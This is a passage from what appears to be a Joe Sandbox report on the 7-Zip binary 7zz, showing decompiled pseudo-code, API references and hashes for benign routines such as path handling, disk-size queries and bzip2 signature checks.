0x00431355
0x0043135b
0x0043135d
0x00431360
0x00431394
0x00431397
0x0043139d
0x00431362
0x00431365
0x00431365
0x0043136c
0x0043136e
0x00431370
0x00431375
0x00431388
0x0043138b
0x00431391
0x00431391
0x00431375
0x00000000
0x0043136c
0x004313a3
0x00000000
0x00000000
0x004313ac
0x004313b5
0x004313bb
0x004313c1
0x004313c4
0x004313e4
0x004313e4
0x00000000
0x004313c6
0x004313c9
0x004313cc
0x004313cc
0x004313d4
0x00000000
0x00000000
0x004313dc
0x004313dd
0x004313e2
0x00000000
0x00000000
0x00000000
0x004313e2
0x00431430
0x004313e8
0x004313f2
0x004313f5
0x004313fa
0x00431405
0x00431408
0x00431409
0x00431410
0x00431411
0x0043141c
0x00431436
0x00431439
0x0043143c
0x0043143f
0x00431442
0x00431445
0x00431454
0x00431454
0x00431458
0x0043145a
0x0043145a
0x00000000
0x00431458
0x00431447
0x0043144e
0x0043144e
0x00431451
0x00000000
0x00431451
0x00431449
0x0043144c
0x00000000
0x00000000
0x00000000
0x0043144c
0x00431428
0x0043142b
0x00000000
0x0043142b
0x004313c4
0x0043145e
0x0043145e
0x00431464
0x00000000
0x00000000
0x00000000
0x00000000
0x004312f9
0x004312f9
0x004312ff
0x00431304
0x0043130c
0x0043130c
0x0043130f
0x00431310
0x00000000
0x00000000
0x00000000
0x00000000
0x004312dd
0x004312dd
0x004312e5
0x004312ea
0x004312eb
0x00000000
0x004312dd

APIs

__EH_prolog.LIBCMT ref: 00431203
SysFreeString.OLEAUT32(00000000), ref: 00431802

Part of subcall function 0040F5DB: __EH_prolog.LIBCMT ref: 0040F5E0

Part of subcall function 0042B864: __EH_prolog.LIBCMT ref: 0042B869

Part of subcall function 00428A47: __EH_prolog.LIBCMT ref: 00428A4C

Part of subcall function 00428510: __EH_prolog.LIBCMT ref: 00428515

SysFreeString.OLEAUT32(00000000), ref: 004317A9

Part of subcall function 0043353F: __EH_prolog.LIBCMT ref: 00433544

Strings

), xrefs: 00432960

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$FreeString
String ID: )
API String ID: 397689101-2427484129
Opcode ID: df01c1d9236870b908461b3370f7b2645975f0d64cdd804e5c176365fc9b52a3
Instruction ID: 3cd5448d51800a9ea3fb603d1c019fc727f39b37be062062b600306fe1c5b3de
Opcode Fuzzy Hash: df01c1d9236870b908461b3370f7b2645975f0d64cdd804e5c176365fc9b52a3
Instruction Fuzzy Hash: 06036C30900259DFDF15DFA5C984BEDBBB0AF18308F14809EE849A7292DB789E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6E9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040B6E9(intOrPtr* __ecx, intOrPtr __edx) {
				WCHAR* _t40;
				long _t42;
				WCHAR* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				intOrPtr* _t54;
				WCHAR* _t57;
				intOrPtr* _t59;
				WCHAR* _t62;
				void* _t72;
				WCHAR* _t75;
				void* _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				WCHAR* _t85;
				void* _t86;

				_t59 = __ecx;
				E0046B890(E00473DF0, _t86);
				_t57 = 0;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((short*)( *((intOrPtr*)(__edx)))) = 0;
				_t82 =  *__ecx;
				_t78 = 0;
				 *((intOrPtr*)(_t86 - 0x14)) = __edx;
				 *((intOrPtr*)(_t86 - 0x10)) = __ecx;
				if(_t82 == 0) {
					L3:
					if(_t78 < 1 || _t82 == 0x5c || _t82 == 0x2e && (_t78 == 1 || _t78 == 2 &&  *((intOrPtr*)(_t59 + 2)) == _t82)) {
						_t40 = 1;
						goto L28;
					} else {
						 *(_t86 - 0x20) = _t57;
						 *(_t86 - 0x1c) = _t57;
						 *(_t86 - 0x18) = _t57;
						E00401E9A(_t86 - 0x20, 3);
						_t80 =  *((intOrPtr*)(_t86 - 0x10));
						 *(_t86 - 4) = _t57;
						if(_t78 <= 3 ||  *((short*)(_t80 + 2)) != 0x3a ||  *((short*)(_t80 + 4)) != 0x5c) {
							L16:
							if( *(_t86 - 0x18) <= 0x105) {
								E00401E9A(_t86 - 0x20, 0x105);
							}
							_t42 = GetCurrentDirectoryW(0x105,  *(_t86 - 0x20));
							_t85 =  *(_t86 - 0x20);
							_t62 = 0;
							if( *_t85 == _t57) {
								L21:
								_t72 = _t62 + _t62;
								 *(_t72 + _t85) = _t57;
								 *(_t86 - 0x1c) = _t62;
								if(_t42 == _t57 || _t42 > 0x104) {
									goto L26;
								} else {
									_t44 =  *(_t86 - 0x20);
									_t112 =  *((short*)(_t72 + _t44 - 2)) - 0x5c;
									if( *((short*)(_t72 + _t44 - 2)) != 0x5c) {
										E004054FE(_t86 - 0x20, _t72, _t112, 0x5c);
									}
									goto L25;
								}
							} else {
								_t75 = _t85;
								do {
									_t62 =  &(_t62[0]);
									_t75 =  &(_t75[1]);
								} while ( *_t75 != _t57);
								goto L21;
							}
						} else {
							if(_t82 < 0x61 || _t82 > 0x7a) {
								if(_t82 < 0x41 || _t82 > 0x5a) {
									goto L16;
								} else {
									goto L25;
								}
							} else {
								L25:
								_t45 = E00403532(_t86 - 0x44, L"\\\\?\\");
								_push(_t86 - 0x20);
								 *(_t86 - 4) = 1;
								_t46 = E0040B0A0(_t86 - 0x38, _t45);
								_push(_t80);
								 *(_t86 - 4) = 2;
								_t47 = E0040BE68(_t86 - 0x2c, _t46);
								 *(_t86 - 4) = 3;
								E00401E26( *((intOrPtr*)(_t86 - 0x14)), _t47);
								E00407A18( *((intOrPtr*)(_t86 - 0x2c)));
								E00407A18( *((intOrPtr*)(_t86 - 0x38)));
								E00407A18( *((intOrPtr*)(_t86 - 0x44)));
								_t57 = 1;
								L26:
								E00407A18( *(_t86 - 0x20));
								_t40 = _t57;
								L28:
								 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
								return _t40;
							}
						}
					}
				}
				_t54 = __ecx;
				do {
					_t78 = _t78 + 1;
					_t54 = _t54 + 2;
				} while ( *_t54 != 0);
				goto L3;
			}

0x0040b6e9
0x0040b6ee
0x0040b6f9
0x0040b6fc
0x0040b6ff
0x0040b702
0x0040b706
0x0040b70b
0x0040b70e
0x0040b711
0x0040b71d
0x0040b720
0x0040b852
0x00000000
0x0040b74e
0x0040b753
0x0040b756
0x0040b759
0x0040b75c
0x0040b764
0x0040b767
0x0040b76a
0x0040b792
0x0040b79a
0x0040b7a0
0x0040b7a0
0x0040b7a9
0x0040b7af
0x0040b7b2
0x0040b7b7
0x0040b7c3
0x0040b7c3
0x0040b7c8
0x0040b7cc
0x0040b7cf
0x00000000
0x0040b7d8
0x0040b7d8
0x0040b7db
0x0040b7e1
0x0040b7e8
0x0040b7e8
0x00000000
0x0040b7e1
0x0040b7b9
0x0040b7b9
0x0040b7bb
0x0040b7bb
0x0040b7bd
0x0040b7be
0x00000000
0x0040b7bb
0x0040b77a
0x0040b77e
0x0040b78a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b7ed
0x0040b7ed
0x0040b7f5
0x0040b7ff
0x0040b803
0x0040b807
0x0040b80c
0x0040b812
0x0040b816
0x0040b81f
0x0040b823
0x0040b82b
0x0040b833
0x0040b83b
0x0040b843
0x0040b845
0x0040b848
0x0040b84e
0x0040b854
0x0040b85a
0x0040b862
0x0040b862
0x0040b77e
0x0040b76a
0x0040b720
0x0040b713
0x0040b715
0x0040b715
0x0040b717
0x0040b718
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040B6EE
GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000003,7476F8A0,00000002,00000000), ref: 0040B7A9

Strings

\\?\, xrefs: 0040B7ED

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CurrentDirectoryH_prolog
String ID: \\?\
API String ID: 1365920442-4282027825
Opcode ID: 49f17fd8d122e47fb144a76ab3c83f5fdf8b6d48540665d144ff3d7243f02d8d
Instruction ID: 33aa0c41793a772aa9b559d5eda45f0ded9524b07273b0857cd6b9bc5248d9c8
Opcode Fuzzy Hash: 49f17fd8d122e47fb144a76ab3c83f5fdf8b6d48540665d144ff3d7243f02d8d
Instruction Fuzzy Hash: E0412736D001049ACF24AFA5C8869EEB775FF99304F54803FE015B72A1D7785A858BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040BACB Relevance: 4.6, APIs: 3, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BACB(void** __ecx) {
				long _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				void _v32;
				void* _v52;
				void* _v56;
				void _v64;
				void* _t29;
				void* _t36;
				void* _t40;
				signed int _t45;
				void** _t47;

				_t47 = __ecx;
				_t29 =  *__ecx;
				if(_t29 == 0xffffffff || __ecx[1] == 0) {
					L9:
					return _t29;
				} else {
					__ecx[2] = 0;
					__ecx[1] = 1;
					__ecx[3] = 0;
					if(DeviceIoControl(_t29, 0x74004, 0, 0,  &_v64, 0x20,  &_v8, 0) == 0) {
						_t29 = DeviceIoControl( *_t47, 0x70000, 0, 0,  &_v32, 0x18,  &_v8, 0);
						if(_t29 == 0) {
							_t29 = DeviceIoControl( *_t47, 0x2404c, 0, 0,  &_v32, 0x18,  &_v8, 0);
							if(_t29 == 0) {
								_t47[1] = 0;
							}
						}
						if(_t47[1] == 0) {
							goto L9;
						} else {
							_t33 = _v12;
							_t45 = _v12 * _v16 >> 0x20;
							_t36 = E0046B370(E0046B370(_t33 * _v16, _t45, _v20, 0), _t45, _v32, _v28);
							_t47[2] = _t36;
							_t47[3] = _t45;
							return _t36;
						}
					}
					_t47[2] = _v56;
					_t40 = _v52;
					_t47[3] = _t40;
					return _t40;
				}
			}

0x0040bad3
0x0040bad6
0x0040badb
0x0040bb87
0x0040bb87
0x0040baec
0x0040bb04
0x0040bb08
0x0040bb0c
0x0040bb13
0x0040bb37
0x0040bb3b
0x0040bb51
0x0040bb55
0x0040bb57
0x0040bb57
0x0040bb55
0x0040bb5d
0x00000000
0x0040bb5f
0x0040bb5f
0x0040bb63
0x0040bb78
0x0040bb7d
0x0040bb80
0x00000000
0x0040bb80
0x0040bb5d
0x0040bb18
0x0040bb1b
0x0040bb1e
0x00000000
0x0040bb1e

APIs

DeviceIoControl.KERNEL32 ref: 0040BB0F
DeviceIoControl.KERNEL32 ref: 0040BB37
DeviceIoControl.KERNEL32 ref: 0040BB51

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: 9eccbc8ffd87a30f2666d0e633387ac5e2bfdfb915f13c61e43ec2ccc257976a
Instruction ID: c42c7d020c1af8b21d211a1f20c38670249b3755f55fb040fe636e444498998b
Opcode Fuzzy Hash: 9eccbc8ffd87a30f2666d0e633387ac5e2bfdfb915f13c61e43ec2ccc257976a
Instruction Fuzzy Hash: CE21A4B290020CBFE710DB95CC81EABB7FCEB04794B00C52AF655E3690D375AD448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004465E0 Relevance: 4.0, Strings: 3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E004465E0(void* __ecx) {
				intOrPtr _t93;
				signed int _t97;
				void* _t113;
				void* _t119;
				void* _t206;
				void* _t208;
				void* _t209;
				void* _t214;
				void* _t215;
				char* _t216;
				intOrPtr _t220;
				void* _t222;
				void* _t223;
				void* _t224;

				_t214 = __ecx;
				 *((intOrPtr*)(__ecx + 0x6fe8)) =  *((intOrPtr*)(_t224 + 8));
				_t93 = E00446260(__ecx);
				if(_t93 != 0) {
					L39:
					return _t93;
				} else {
					_t215 = 0;
					if( *((intOrPtr*)(__ecx + 0x7010)) <= 0) {
						L9:
						_t216 =  *((intOrPtr*)(_t224 + 0x28));
						_t206 = 0;
						 *_t216 = 0;
						do {
							 *((char*)(_t224 + _t206 + 0x1c)) = E00445F70();
							_t206 = _t206 + 1;
						} while (_t206 < 4);
						if( *((char*)(_t224 + 0x1c)) != 0x42 ||  *((char*)(_t224 + 0x1d)) != 0x5a ||  *((char*)(_t224 + 0x1e)) != 0x68) {
							L38:
							return 0;
						}
						_t97 =  *(_t224 + 0x1f);
						if(_t97 <= 0x30 || _t97 > 0x39) {
							goto L38;
						}
						 *_t216 = 1;
						 *((intOrPtr*)(_t214 + 0x6fe4)) = 0;
						_t220 = ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4) * 4) * 4 << 5) - 0x493e00;
						if( *((intOrPtr*)(_t214 + 0x7014)) == 0) {
							_t207 = _t214 + 0x138;
							 *((intOrPtr*)(_t224 + 0x18)) =  *((intOrPtr*)(_t214 + 0x6fec));
							asm("cdq");
							asm("sbb edx, ebx");
							asm("adc edx, ecx");
							_t93 = E00447BA0(_t214,  *((intOrPtr*)(_t214 + 0x140)) -  *((intOrPtr*)(_t214 + 0x148)) - (0x20 -  *((intOrPtr*)(_t214 + 0x138)) >> 3) +  *((intOrPtr*)(_t214 + 0x150)),  *((intOrPtr*)(_t214 + 0x6fec)));
							if(_t93 == 0) {
								while(1) {
									_t93 = E00446500(_t214, _t224 + 0x2c, _t224 + 0x1c);
									if(_t93 != 0) {
										goto L39;
									}
									if( *((intOrPtr*)(_t224 + 0x2c)) != 0) {
										goto L38;
									}
									_t146 =  *((intOrPtr*)(_t224 + 0x18));
									_push(_t224 + 0x28);
									_push(_t224 + 0x14);
									_push(_t224 + 0x14);
									_push(_t214 + 0x47b4);
									_push(_t214 + 0x160);
									_push(_t220);
									_t93 = E004469A0(_t207,  *( *((intOrPtr*)(_t224 + 0x18))));
									if(_t93 != 0) {
										goto L39;
									} else {
										E004470F0( *_t146,  *((intOrPtr*)(_t224 + 0x10)));
										if( *((intOrPtr*)(_t224 + 0x28)) == 0) {
											_push(_t214 + 0x10);
											_t205 =  *((intOrPtr*)(_t224 + 0x14));
											_push( *((intOrPtr*)(_t224 + 0x14)));
											_t113 = E00447150( *_t146 + 0x400,  *((intOrPtr*)(_t224 + 0x14)));
										} else {
											_t205 =  *((intOrPtr*)(_t224 + 0x10));
											_push(_t214 + 0x10);
											_push( *((intOrPtr*)(_t224 + 0x14)));
											_t113 = E00447240( *_t146 + 0x400,  *((intOrPtr*)(_t224 + 0x10)));
										}
										if(_t113 !=  *((intOrPtr*)(_t224 + 0x1c))) {
											return 1;
										} else {
											asm("cdq");
											asm("sbb edx, ebx");
											asm("adc edx, ecx");
											_t119 = E00447BA0(_t214,  *((intOrPtr*)(_t207 + 8)) -  *((intOrPtr*)(_t207 + 0x10)) - (0x20 -  *_t207 >> 3) +  *((intOrPtr*)(_t207 + 0x18)), _t205);
											if(_t119 == 0) {
												continue;
											} else {
												return _t119;
											}
										}
									}
									goto L40;
								}
							}
							goto L39;
						} else {
							 *((intOrPtr*)(_t214 + 0x7018)) = 0;
							 *((char*)(_t214 + 0x701e)) = 0;
							 *((char*)(_t214 + 0x701d)) = 0;
							 *((char*)(_t214 + 0x701c)) = 0;
							E00467B30(_t214 + 0x7020);
							E00467B10( *((intOrPtr*)(_t214 + 0x6fec)) + 0x18);
							 *((intOrPtr*)(_t214 + 0x7028)) = 0;
							 *((intOrPtr*)(_t214 + 0x7024)) = 0;
							_t150 = _t214 + 0x6ff4;
							 *((intOrPtr*)(_t214 + 0x702c)) = _t220;
							E00467B10(_t214 + 0x6ff4);
							_t208 = 0;
							if( *((intOrPtr*)(_t214 + 0x7010)) > 0) {
								_t223 = 0;
								do {
									E00467AC0( *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x6fec)) + _t223 + 0x10)));
									_t208 = _t208 + 1;
									_t223 = _t223 + 0x11c;
								} while (_t208 <  *((intOrPtr*)(_t214 + 0x7010)));
							}
							E00467B30(_t150);
							E00467B10(_t214 + 0x7020);
							_t209 = 0;
							if( *((intOrPtr*)(_t214 + 0x7010)) > 0) {
								_t222 = 0;
								do {
									_t197 =  *((intOrPtr*)(_t214 + 0x6fec));
									E00467AC0( *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x6fec)) + _t222 + 0x14)));
									_t209 = _t209 + 1;
									_t222 = _t222 + 0x11c;
								} while (_t209 <  *((intOrPtr*)(_t214 + 0x7010)));
							}
							E00467B30(_t214 + 0x7020);
							_t93 =  *((intOrPtr*)(_t214 + 0x7028));
							if(_t93 != 0) {
								goto L39;
							} else {
								_t93 =  *((intOrPtr*)(_t214 + 0x7024));
								if(_t93 != 0) {
									goto L39;
								} else {
									asm("cdq");
									asm("sbb edx, edi");
									asm("adc edx, ebx");
									return E00447BA0(_t214,  *((intOrPtr*)(_t214 + 0x140)) -  *((intOrPtr*)(_t214 + 0x148)) - (0x20 -  *((intOrPtr*)(_t214 + 0x138)) >> 3) +  *((intOrPtr*)(_t214 + 0x150)), _t197);
								}
							}
						}
					} else {
						 *((intOrPtr*)(_t224 + 0x2c)) = 0;
						while(1) {
							_t197 =  *((intOrPtr*)(_t224 + 0x2c));
							_t213 =  *((intOrPtr*)(_t214 + 0x6fec)) +  *((intOrPtr*)(_t224 + 0x2c));
							if(E00445E90( *((intOrPtr*)(_t214 + 0x6fec)) +  *((intOrPtr*)(_t224 + 0x2c))) == 0) {
								break;
							}
							if( *((intOrPtr*)(_t214 + 0x7014)) == 0) {
								L8:
								_t215 = _t215 + 1;
								 *((intOrPtr*)(_t224 + 0x2c)) =  *((intOrPtr*)(_t224 + 0x2c)) + 0x11c;
								if(_t215 <  *((intOrPtr*)(_t214 + 0x7010))) {
									continue;
								} else {
									goto L9;
								}
							} else {
								_t93 = E00467B30(_t213 + 0x10);
								if(_t93 != 0) {
									goto L39;
								} else {
									_t93 = E00467B30(_t213 + 0x14);
									if(_t93 != 0) {
										goto L39;
									} else {
										_t93 = E00467B30(_t213 + 0x18);
										if(_t93 != 0) {
											goto L39;
										} else {
											goto L8;
										}
									}
								}
							}
							goto L40;
						}
						return 0x8007000e;
					}
				}
				L40:
			}

0x004465ea
0x004465ed
0x004465f3
0x004465fc
0x00446994
0x00446994
0x00446602
0x00446608
0x0044660c
0x00446680
0x00446680
0x00446684
0x00446686
0x0044668a
0x00446691
0x00446695
0x00446696
0x004466a0
0x0044698b
0x00000000
0x0044698b
0x004466bc
0x004466c2
0x00000000
0x00000000
0x004466d5
0x004466d9
0x004466f8
0x00446700
0x0044685d
0x0044686a
0x00446872
0x0044687b
0x00446882
0x00446888
0x0044688f
0x00446895
0x004468a1
0x004468a8
0x00000000
0x00000000
0x004468b4
0x00000000
0x00000000
0x004468ba
0x004468c6
0x004468cb
0x004468d2
0x004468d9
0x004468da
0x004468dd
0x004468e0
0x004468e7
0x00000000
0x004468ed
0x004468f3
0x004468fe
0x0044692b
0x0044692c
0x00446930
0x00446931
0x00446900
0x00446904
0x0044690b
0x0044690c
0x00446915
0x00446915
0x0044693a
0x00446988
0x0044693c
0x0044694f
0x00446958
0x0044695f
0x00446965
0x0044696c
0x00000000
0x00446979
0x00446979
0x00446979
0x0044696c
0x0044693a
0x00000000
0x004468e7
0x00446895
0x00000000
0x00446706
0x0044670c
0x00446712
0x00446719
0x00446720
0x00446727
0x00446735
0x0044673a
0x00446740
0x00446746
0x0044674c
0x00446754
0x0044675f
0x00446763
0x00446765
0x00446767
0x00446771
0x0044677c
0x0044677d
0x00446783
0x00446767
0x00446789
0x00446794
0x0044679f
0x004467a3
0x004467a5
0x004467a7
0x004467a7
0x004467b1
0x004467bc
0x004467bd
0x004467c3
0x004467a7
0x004467cd
0x004467d2
0x004467da
0x00000000
0x004467e0
0x004467e0
0x004467e8
0x00000000
0x004467ee
0x00446815
0x0044681d
0x00446821
0x00446833
0x00446833
0x004467e8
0x004467da
0x0044660e
0x0044660e
0x00446612
0x00446618
0x0044661c
0x00446627
0x00000000
0x00000000
0x00446635
0x00446667
0x00446671
0x0044667a
0x0044667e
0x00000000
0x00000000
0x00000000
0x00000000
0x00446637
0x0044663a
0x00446641
0x00000000
0x00446647
0x0044664a
0x00446651
0x00000000
0x00446657
0x0044665a
0x00446661
0x00000000
0x00000000
0x00000000
0x00000000
0x00446661
0x00446651
0x00446641
0x00000000
0x00446635
0x00446842
0x00446842
0x0044660c
0x00000000

Strings

h, xrefs: 004466B1
Z, xrefs: 004466A6
B, xrefs: 0044669B

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorEventLastReset
String ID: B$Z$h
API String ID: 1621066496-418080759
Opcode ID: 31eb4e5eb83f84a862abec244540b5fd79ff3231d1edc22ba3dc5a5c688854da
Instruction ID: 230a258f7045333de16a7656bf94cdb6ffb83da81a8c701ada6b5a21721b5eb4
Opcode Fuzzy Hash: 31eb4e5eb83f84a862abec244540b5fd79ff3231d1edc22ba3dc5a5c688854da
Instruction Fuzzy Hash: 05A126717047018BD724DF39C890AABB7E1AF85308F45092EE5AA83341DB39F94DCB96

Uniqueness

Uniqueness Score: -1.00%

Function 004285AD Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 379
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E004285AD(void* __ecx) {
				signed int _t160;
				intOrPtr _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				intOrPtr _t175;
				void* _t178;
				intOrPtr* _t188;
				signed int _t194;
				signed int _t196;
				intOrPtr* _t199;
				signed int _t202;
				signed int* _t205;
				intOrPtr _t211;
				signed int _t215;
				void* _t225;
				void* _t226;
				signed int _t240;
				signed int _t241;
				void* _t242;
				void* _t243;
				signed int _t244;
				void* _t245;
				intOrPtr _t246;
				signed int _t247;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				signed int _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				void* _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t305;
				void* _t307;
				intOrPtr _t308;
				void* _t309;
				signed int _t310;
				void* _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				void* _t317;
				void* _t319;

				E0046B890(E00476AE2, _t319);
				_t317 = __ecx;
				_t305 = 0;
				if( *((char*)(__ecx + 0x110)) == 0) {
					_t250 =  *(__ecx + 0x24);
					if(_t250 != 0) {
						__eflags = _t250;
						 *(_t319 - 0x18) = 0;
						 *(_t319 - 0x14) = 0;
						 *(_t319 - 0x10) = 0;
						if(_t250 > 0) {
							do {
								_t303 =  *(_t319 - 0x10);
								__eflags =  *(_t317 + 0x38);
								_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t303 * 4));
								_t314 =  *((intOrPtr*)(_t211 + 0x20));
								_t246 =  *((intOrPtr*)(_t211 + 0x24));
								 *((intOrPtr*)(_t319 - 0x20)) = _t314;
								if( *(_t317 + 0x38) == 0) {
									__eflags = _t303 - _t250 - 1;
									if(__eflags >= 0) {
										_t315 = _t317 + 0x94;
										E00408767(_t315, __eflags, 0);
										_t314 =  *((intOrPtr*)(_t319 - 0x20));
										 *( *(_t315 + 0xc)) =  *(_t319 - 0x14);
									} else {
										E0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t246,  *(_t319 - 0x14));
									}
									_t215 = 1;
									__eflags = _t314 - _t215;
									 *(_t319 - 0x1c) = _t215;
									if(_t314 > _t215) {
										do {
											E00415C6D(_t317 + 0x94,  *(_t319 - 0x1c) +  *(_t319 - 0x14));
											 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 1;
											__eflags =  *(_t319 - 0x1c) - _t314;
										} while ( *(_t319 - 0x1c) < _t314);
									}
								}
								 *(_t319 - 0x18) =  *(_t319 - 0x18) + _t246;
								 *(_t319 - 0x14) =  *(_t319 - 0x14) + _t314;
								E0042389F(_t317 + 0x58, _t246, _t314);
								_t250 =  *(_t317 + 0x24);
								 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
								__eflags =  *(_t319 - 0x10) - _t250;
							} while ( *(_t319 - 0x10) < _t250);
							_t305 = 0;
							__eflags = 0;
						}
						_t160 =  *(_t317 + 0x38);
						__eflags = _t160 - _t305;
						if(_t160 != _t305) {
							 *(_t319 - 0x10) =  *(_t319 - 0x10) & 0x00000000;
							__eflags = _t160;
							if(_t160 > 0) {
								_t65 = _t319 - 0x1c;
								 *_t65 =  *(_t319 - 0x1c) & 0x00000000;
								__eflags =  *_t65;
								do {
									_t278 = 0;
									_t205 =  *((intOrPtr*)(_t317 + 0x3c)) +  *(_t319 - 0x1c);
									_t244 =  *_t205;
									__eflags = _t244;
									if(_t244 > 0) {
										_t302 =  *((intOrPtr*)(_t317 + 0x64));
										do {
											_t278 = _t278 +  *_t302;
											_t302 = _t302 + 8;
